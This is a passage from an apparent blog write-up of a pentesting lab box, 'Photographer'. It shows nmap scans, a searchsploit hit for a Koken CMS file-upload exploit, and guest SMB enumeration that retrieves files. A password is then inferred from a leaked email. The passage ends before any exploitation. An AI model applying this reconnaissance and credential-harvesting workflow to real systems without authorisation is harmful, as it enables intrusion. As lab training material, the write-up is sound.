srcset="https://substackcdn.com/image/fetch/$s_!Z7F3!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 424w, https://substackcdn.com/image/fetch/$s_!Z7F3!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 848w, https://substackcdn.com/image/fetch/$s_!Z7F3!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 1272w, https://substackcdn.com/image/fetch/$s_!Z7F3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>Offensive Security</h2><p>On this another internal Pentesting practices, all we got is an IP Address:</p><pre><code><code>192.168.221.76</code></code></pre><p>Start with:</p><ol><li><p><em>Network Enumeration and Port Discovery</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ping -c2 192.168.221.76
PING 192.168.221.76 (192.168.221.76) 56(84) bytes of data.
64 bytes from 192.168.221.76: icmp_seq=1 ttl=61 time=20.3 ms
64 bytes from 192.168.221.76: icmp_seq=2 ttl=61 time=19.6 ms

--- 192.168.221.76 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1023ms
rtt min/avg/max/mdev = 19.601/19.939/20.277/0.338 ms</code></pre></div><p>Continue with NMAP Scanning:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p- --min-rate 8000 192.168.221.76 -oA nmap/nmapscan                                         
Starting Nmap 7.95 ( https://nmap.org ) at
Nmap scan report for 192.168.221.76
Host is up (0.024s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8000/tcp open  http-alt

Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p22,80,139,445,8000 -sC -sV 192.168.221.76 -oA nmap/nmapscan-ports
Starting Nmap 7.95 ( https://nmap.org ) at 
Nmap scan report for 192.168.221.76
Host is up (0.020s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 41:4d:aa:18:86:94:8e:88:a7:4c:6b:42:60:76:f1:4f (RSA)
|   256 4d:a3:d0:7a:8f:64:ef:82:45:2d:01:13:18:b7:e0:13 (ECDSA)
|_  256 1a:01:7a:4f:cf:95:85:bf:31:a1:4f:15:87:ab:94:e2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Photographer by v1n1v131r4
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: daisa ahomi
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Koken 0.22.24
Service Info: Host: PHOTOGRAPHER; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: photographer
|   NetBIOS computer name: PHOTOGRAPHER\x00
|   Domain name: \x00
|   FQDN: photographer
|_  System time: 2026-03-01T00:31:39-05:00
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-03-01T05:31:39
|_  start_date: N/A
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><p>As we saw here, we have 2 HTTP, and uniquely an SMB shares in this Linux based machine.</p><p>Let&#8217;s start with the HTTP on Port 80, even I have a great feeling the vuln it&#8217;s on Port 8000 (the second Web) based on NMAP Fingerprint.</p><ol start="2"><li><p><em>HTTP Enumeration</em></p></li></ol><p>Let&#8217;s do manual first on Port 80.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!MbtA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85dbc5ba-7e63-4e18-8228-d121c8d29b25_1699x834.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!MbtA!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85dbc5ba-7e63-4e18-8228-d121c8d29b25_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!MbtA!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85dbc5ba-7e63-4e18-8228-d121c8d29b25_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!MbtA!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85dbc5ba-7e63-4e18-8228-d121c8d29b25_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!MbtA!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85dbc5ba-7e63-4e18-8228-d121c8d29b25_1699x834.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!MbtA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85dbc5ba-7e63-4e18-8228-d121c8d29b25_1699x834.png" width="1456" height="715" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/85dbc5ba-7e63-4e18-8228-d121c8d29b25_1699x834.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:715,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:2228104,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189524877?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85dbc5ba-7e63-4e18-8228-d121c8d29b25_1699x834.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!MbtA!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85dbc5ba-7e63-4e18-8228-d121c8d29b25_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!MbtA!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85dbc5ba-7e63-4e18-8228-d121c8d29b25_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!MbtA!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85dbc5ba-7e63-4e18-8228-d121c8d29b25_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!MbtA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F85dbc5ba-7e63-4e18-8228-d121c8d29b25_1699x834.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>After just 5 seconds, </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!LNaZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3cb764a-0e19-467b-a92c-1214da2d01d2_1699x834.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!LNaZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3cb764a-0e19-467b-a92c-1214da2d01d2_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!LNaZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3cb764a-0e19-467b-a92c-1214da2d01d2_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!LNaZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3cb764a-0e19-467b-a92c-1214da2d01d2_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!LNaZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3cb764a-0e19-467b-a92c-1214da2d01d2_1699x834.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!LNaZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3cb764a-0e19-467b-a92c-1214da2d01d2_1699x834.png" width="1456" height="715" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f3cb764a-0e19-467b-a92c-1214da2d01d2_1699x834.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:715,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:138611,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189524877?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3cb764a-0e19-467b-a92c-1214da2d01d2_1699x834.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!LNaZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3cb764a-0e19-467b-a92c-1214da2d01d2_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!LNaZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3cb764a-0e19-467b-a92c-1214da2d01d2_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!LNaZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3cb764a-0e19-467b-a92c-1214da2d01d2_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!LNaZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3cb764a-0e19-467b-a92c-1214da2d01d2_1699x834.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>This Web app is static and not interesting, let&#8217;s move to the next Port:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!y4IX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F047115fb-1883-4750-8451-163b2b682bd0_1699x834.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!y4IX!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F047115fb-1883-4750-8451-163b2b682bd0_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!y4IX!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F047115fb-1883-4750-8451-163b2b682bd0_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!y4IX!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F047115fb-1883-4750-8451-163b2b682bd0_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!y4IX!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F047115fb-1883-4750-8451-163b2b682bd0_1699x834.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!y4IX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F047115fb-1883-4750-8451-163b2b682bd0_1699x834.png" width="1456" height="715" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/047115fb-1883-4750-8451-163b2b682bd0_1699x834.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:715,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:64306,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189524877?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F047115fb-1883-4750-8451-163b2b682bd0_1699x834.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!y4IX!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F047115fb-1883-4750-8451-163b2b682bd0_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!y4IX!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F047115fb-1883-4750-8451-163b2b682bd0_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!y4IX!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F047115fb-1883-4750-8451-163b2b682bd0_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!y4IX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F047115fb-1883-4750-8451-163b2b682bd0_1699x834.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Now we&#8217;re on a Web that&#8217;s based on something. </p><p>Looking back at NMAP fingerprint the Web based could have a CVE:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ searchsploit Koken 0.22.24
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                             |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)                                                                                                                                                  | php/webapps/48706.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results</code></pre></div><p>And yep, it&#8217;s says File Upload (with Authentication), I believe we&#8217;re on a right track so let&#8217;s continue.</p><p>Regarding credential, I have a great feeling this could be retrieve from:</p><ul><li><p>Web Discovery</p></li><li><p>SMB Share Discovery</p></li></ul><p>Let&#8217;s SMB Share first.</p><ol start="3"><li><p><em>Guest Account SMB Enumeration</em></p></li></ol><p>Here we can use Guest account for the SMB Enumeration:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nxc smb 192.168.221.76 -u '' -p ''
SMB         192.168.221.76  445    PHOTOGRAPHER     [*] Unix - Samba (name:PHOTOGRAPHER) (domain:) (signing:False) (SMBv1:True) 
SMB         192.168.221.76  445    PHOTOGRAPHER     [+] \: (Guest)</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nxc smb 192.168.221.76 -u '' -p '' --shares
SMB         192.168.221.76  445    PHOTOGRAPHER     [*] Unix - Samba (name:PHOTOGRAPHER) (domain:) (signing:False) (SMBv1:True) 
SMB         192.168.221.76  445    PHOTOGRAPHER     [+] \: (Guest)
SMB         192.168.221.76  445    PHOTOGRAPHER     [*] Enumerated shares
SMB         192.168.221.76  445    PHOTOGRAPHER     Share           Permissions     Remark
SMB         192.168.221.76  445    PHOTOGRAPHER     -----           -----------     ------
SMB         192.168.221.76  445    PHOTOGRAPHER     print$                          Printer Drivers
SMB         192.168.221.76  445    PHOTOGRAPHER     sambashare      READ            Samba on Ubuntu
SMB         192.168.221.76  445    PHOTOGRAPHER     IPC$                            IPC Service (photographer server (Samba, Ubuntu))</code></pre></div><p>And we have one read access.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo smbclient \\\\192.168.221.76\\sambashare -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \&gt; ls
  .                                   D        0  Thu Aug 20 15:51:08 2020
  ..                                  D        0  Thu Aug 20 16:08:59 2020
  mailsent.txt                        N      503  Tue Jul 21 01:29:40 2020
  wordpress.bkp.zip                   N 13930308  Tue Jul 21 01:22:23 2020

                3300080 blocks of size 1024. 2958792 blocks available
smb: \&gt; mget *
Get file mailsent.txt? y
getting file \mailsent.txt of size 503 as mailsent.txt (6.2 KiloBytes/sec) (average 6.2 KiloBytes/sec)
Get file wordpress.bkp.zip? y
getting file \wordpress.bkp.zip of size 13930308 as wordpress.bkp.zip (6734.6 KiloBytes/sec) (average 6481.3 KiloBytes/sec)
smb: \&gt;</code></pre></div><p>Let&#8217;s see what&#8217;s inside on the TXT and Zip files.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ll
total 13608
-rw-r--r-- 1 root root      503 Mar  1 05:33 mailsent.txt
-rw-r--r-- 1 root root 13930308 Mar  1 05:33 wordpress.bkp.zip</code></pre></div><p>The Word Press Huge file, and not very useful:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ tree . | grep config       
&#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; setup-config.php
&#9500;&#9472;&#9472; wp-config-sample.php
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; config.php
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; postcss.config.js</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat mailsent.txt                         
Message-ID: &lt;4129F3CA.2020509@dc.edu&gt;
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence &lt;agi@photographer.com&gt;
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi &lt;daisa@photographer.com&gt;
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)</code></pre></div><p>This is the Juicy file, from this TXT file we can have the User email for Logon, and a password lists, and turns-out the password is babygirl.</p><p>So now we have a pair for Web logon:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: daisa@photographer.com
